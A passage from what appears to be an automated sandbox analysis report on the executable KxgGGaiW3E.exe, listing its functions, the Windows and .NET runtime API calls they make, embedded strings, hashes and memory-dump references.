Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: a6e7603d86db72e02d2dddbe67447fe2388a7e0e6186c1a35f2d143e08a22dc4
Instruction ID: 66fbffbc50e55afcd887978e7e3e354eb1b282b1329b64f13e38be74338ae927
Opcode Fuzzy Hash: a6e7603d86db72e02d2dddbe67447fe2388a7e0e6186c1a35f2d143e08a22dc4
Instruction Fuzzy Hash: 05513920B0D14B47F7D4BB259851736EAD2AF00750F88427AD93DAE2E1DE2CF48586E2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CC630 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F30C6BD1), ref: 00007FF7F30CC664
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F30C6BD1), ref: 00007FF7F30CC66E
CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F30C6BD1), ref: 00007FF7F30CC68D
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F30C6BD1), ref: 00007FF7F30CC6A1

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ErrorLastMultipleWait$HandlesObjects
String ID:
API String ID: 2817213684-0
Opcode ID: e67efaafb375579e134aedbf741a0c552a1e6a4ca6ae6ed1803f3103c2dd705d
Instruction ID: c04b6434cabe71261f7d4ed4cb45ac02d6e5ebd6b0e87a4d4a4ad5113764cd06
Opcode Fuzzy Hash: e67efaafb375579e134aedbf741a0c552a1e6a4ca6ae6ed1803f3103c2dd705d
Instruction Fuzzy Hash: DC11A331B0C65593D754AB15F55042AF2A1FB44B90F940136EADDDBBD5CF3CD8408780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F312B1B0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7F312B1DC
GetCurrentThreadId.KERNEL32 ref: 00007FF7F312B1EA
GetCurrentProcessId.KERNEL32 ref: 00007FF7F312B1F6
QueryPerformanceCounter.KERNEL32 ref: 00007FF7F312B206

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: ac7ab9dd74e7e7389db1b95bbae797b65a77c40960a93acce7b48fb33917dab3
Instruction ID: cbb583f2560076e8afff88bd1300e9f06acf1f4ae8aab014a66957eeeb5c87bb
Opcode Fuzzy Hash: ac7ab9dd74e7e7389db1b95bbae797b65a77c40960a93acce7b48fb33917dab3
Instruction Fuzzy Hash: E7115E26B14F058AEB40DF60E8442B873A4FB18758F840E35DE2D9BBA4DF3CE1588390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F312C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(00007FF7F312B843,?,?,?,?,00007FF7F312AC7B), ref: 00007FF7F312C58C
RaiseException.KERNEL32(00007FF7F312B843,?,?,?,?,00007FF7F312AC7B), ref: 00007FF7F312C5CD

Strings

csm, xrefs: 00007FF7F312C5BA

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 728371364096f648f31745791c89a4104a50dd87d54279bb94e5c575f60b5918
Instruction ID: af4ccde5fefe77b521c2d423ef928d22445d8a36e28588c160b6260038f63818
Opcode Fuzzy Hash: 728371364096f648f31745791c89a4104a50dd87d54279bb94e5c575f60b5918
Instruction Fuzzy Hash: 0D116D32A18B8182EB619F15F44026AB7E0FB88B94F984235DF9D5B798DF3CD551CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F4020 Relevance: 5.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF7F30EF8F2,?,00000000,?,?,00000000,00007FF7F30FF0D9), ref: 00007FF7F30F409E
LeaveCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF7F30EF8F2,?,00000000,?,?,00000000,00007FF7F30FF0D9), ref: 00007FF7F30F40EE
EnterCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF7F30EF8F2,?,00000000,?,?,00000000,00007FF7F30FF0D9), ref: 00007FF7F30F4123
LeaveCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF7F30EF8F2,?,00000000,?,?,00000000,00007FF7F30FF0D9), ref: 00007FF7F30F413E

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 0fb3df51c682bcde55da87e9572e4b62eb2ada56f60dc6d1263201ea0e4265ec
Instruction ID: 17616a22c25628dd86c39f03afb8973aa7029567b99796e9c4eaf49986f65c06
Opcode Fuzzy Hash: 0fb3df51c682bcde55da87e9572e4b62eb2ada56f60dc6d1263201ea0e4265ec
Instruction Fuzzy Hash: 3F414331A08A5282E790EF21E8C0578A3A5FF45784F94413ADE6D6F6E4CF3CE492C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30E6E70 Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000080,00007FF7F30E6FF9,?,?,00000000,00007FF7F30F26BA), ref: 00007FF7F30E6EBA
LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF7F30E6FF9,?,?,00000000,00007FF7F30F26BA), ref: 00007FF7F30E6EFC
EnterCriticalSection.KERNEL32(?,?,00000080,00007FF7F30E6FF9,?,?,00000000,00007FF7F30F26BA), ref: 00007FF7F30E6F27
LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF7F30E6FF9,?,?,00000000,00007FF7F30F26BA), ref: 00007FF7F30E6F48

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 75d63f245788b162980f9012f4fa1529ccaf0e472e3db3d994f2288b863829b1
Instruction ID: c96e06b506eb2f2c536ac38b9da7e63951b6209cd5e366119b2e08a0202ddbf6
Opcode Fuzzy Hash: 75d63f245788b162980f9012f4fa1529ccaf0e472e3db3d994f2288b863829b1
Instruction Fuzzy Hash: CA210E61A0894A82EB90EB24E8843B8A3A9EF15390FC8473AD53C6D5D5DF2CD595C3A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: KxgGGaiW3E.exePID: 7424, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	805
Total number of Limit Nodes:	42

Executed Functions

Function 00007FF703015600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF703015653

Part of subcall function 00007FF70301D980: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF70301DA7D

Strings

StressLogLevel, xrefs: 00007FF7030156AD
TotalStressLogSize, xrefs: 00007FF703015674

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionHandlerVectored_wcsicmp
String ID: StressLogLevel$TotalStressLogSize
API String ID: 2513536313-4058818204
Opcode ID: da0bfe873ee71b68cd1092bd1c2a2b3150a6b4515be0c2f2f074457c694a3fbc
Instruction ID: b1e75285be510952431047f6d222ddca1ce59d14ae668778281ef5a054015e6a
Opcode Fuzzy Hash: da0bfe873ee71b68cd1092bd1c2a2b3150a6b4515be0c2f2f074457c694a3fbc
Instruction Fuzzy Hash: D631883291964286EB80BF14EC016B9F792EF82784F984031DA4D3B795EF7CE505C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703040B10 Relevance: 2.1, APIs: 1, Instructions: 553COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF703023EA0: CreateEventW.KERNEL32 ref: 00007FF703023EE1

Part of subcall function 00007FF7030248F0: QueryPerformanceCounter.KERNEL32 ref: 00007FF7030248F9

DebugBreak.KERNEL32 ref: 00007FF703041453

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: BreakCounterCreateDebugEventPerformanceQuery
String ID:
API String ID: 4239280443-0
Opcode ID: 543e9d0fc8645ba3728e5f5564f744260f73d1bd7301d2d127096e2af65f1ec8
Instruction ID: df8c23cace425afbc5cf986ec1548d1a4c049f0d912269c0b0911d2772f0c727
Opcode Fuzzy Hash: 543e9d0fc8645ba3728e5f5564f744260f73d1bd7301d2d127096e2af65f1ec8
Instruction Fuzzy Hash: 60623A72A09B4285F780EB24FC80665F3A5FF59784F909A39D98D63761DF7CA1A0C324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70303D562 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF70303D8B8
LeaveCriticalSection.KERNEL32 ref: 00007FF70303D8FC
LeaveCriticalSection.KERNEL32 ref: 00007FF70303D92E
GetTickCount.KERNEL32 ref: 00007FF70303DC8C

Part of subcall function 00007FF703036E70: EnterCriticalSection.KERNEL32(?,?,00000080,00007FF703036FF9,?,?,00000000,00007FF7030426BA), ref: 00007FF703036EBA
Part of subcall function 00007FF703036E70: LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF703036FF9,?,?,00000000,00007FF7030426BA), ref: 00007FF703036EFC
Part of subcall function 00007FF703036E70: EnterCriticalSection.KERNEL32(?,?,00000080,00007FF703036FF9,?,?,00000000,00007FF7030426BA), ref: 00007FF703036F27
Part of subcall function 00007FF703036E70: LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF703036FF9,?,?,00000000,00007FF7030426BA), ref: 00007FF703036F48

Strings

condemned generation num: %d, xrefs: 00007FF70303D71D
L9%RP/, xrefs: 00007FF70303D737
D9%g/, xrefs: 00007FF70303D839
.NET BGC, xrefs: 00007FF70303D8CF
BEGIN, xrefs: 00007FF70303D80D

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$CountTick
String ID: .NET BGC$BEGIN$D9%g/$L9%RP/$condemned generation num: %d
API String ID: 768476922-3363591616
Opcode ID: e6f3f8c3250402f8dc8a6e9be636a06c378cc3c9619ec16b6a59589df6dfeddf
Instruction ID: 0d70f4897a001517bd1fd5f61f4e2d3b75212165d4196f75e204d26f1b519fb6
Opcode Fuzzy Hash: e6f3f8c3250402f8dc8a6e9be636a06c378cc3c9619ec16b6a59589df6dfeddf
Instruction Fuzzy Hash: 31327161E0DA4281F6D1BB25EE802B4E3A6FF54744F849539DA4D722A2DF3CF581C364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703024260 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7030242CE
IsProcessInJob.KERNEL32 ref: 00007FF7030242DE
QueryInformationJobObject.KERNEL32 ref: 00007FF70302430E
GlobalMemoryStatusEx.KERNEL32 ref: 00007FF703024377
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7030243BE
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF703024435

Strings

@, xrefs: 00007FF70302442A
@, xrefs: 00007FF70302435F
@, xrefs: 00007FF7030243B3

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
String ID: @$@$@
API String ID: 2645093340-1177533131
Opcode ID: 1458fe793f73d0cfa61fd3255034cc0523ea1ccfecbde58e2ab3c3e4467f4cab
Instruction ID: 2994adf8b45e9dd3e95989a87827655ee34a172e96a1c4e07e150c8bc0907479
Opcode Fuzzy Hash: 1458fe793f73d0cfa61fd3255034cc0523ea1ccfecbde58e2ab3c3e4467f4cab
Instruction Fuzzy Hash: 54512031B09AC185EBB19F12E8407AAF3A1FF89B50F844135CAAD63B88CF7CD4458B14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7030341B0 Relevance: 10.6, APIs: 7, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7030341BF
EnterCriticalSection.KERNEL32 ref: 00007FF7030341F7
LeaveCriticalSection.KERNEL32 ref: 00007FF70303420F
SwitchToThread.KERNEL32 ref: 00007FF7030342CA
SwitchToThread.KERNEL32 ref: 00007FF7030342D3
SwitchToThread.KERNEL32 ref: 00007FF7030342FD
LeaveCriticalSection.KERNEL32 ref: 00007FF7030343A2

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Thread$CriticalSectionSwitch$Leave$CurrentEnter
String ID:
API String ID: 2584832284-0
Opcode ID: 4c2abb5f5504ebf7260ed8b39c3868353a6e3314a47b18f8cdf188650afd9682
Instruction ID: 73a777304606b194e6c81a7cad0438e29ce920bdc8c4929d4107678703a4b128
Opcode Fuzzy Hash: 4c2abb5f5504ebf7260ed8b39c3868353a6e3314a47b18f8cdf188650afd9682
Instruction Fuzzy Hash: 54517D30E0E11386F2D0BB66ED81A79E29AAF40711FC08139E55DBB2D1DF2CB4418B79

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703024720 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF70302472F
GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF70302476D
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF703024799
GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF7030247AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF7030247B9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF703024850
GetProcessAffinityMask.KERNEL32 ref: 00007FF703024863

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
String ID:
API String ID: 580471860-0
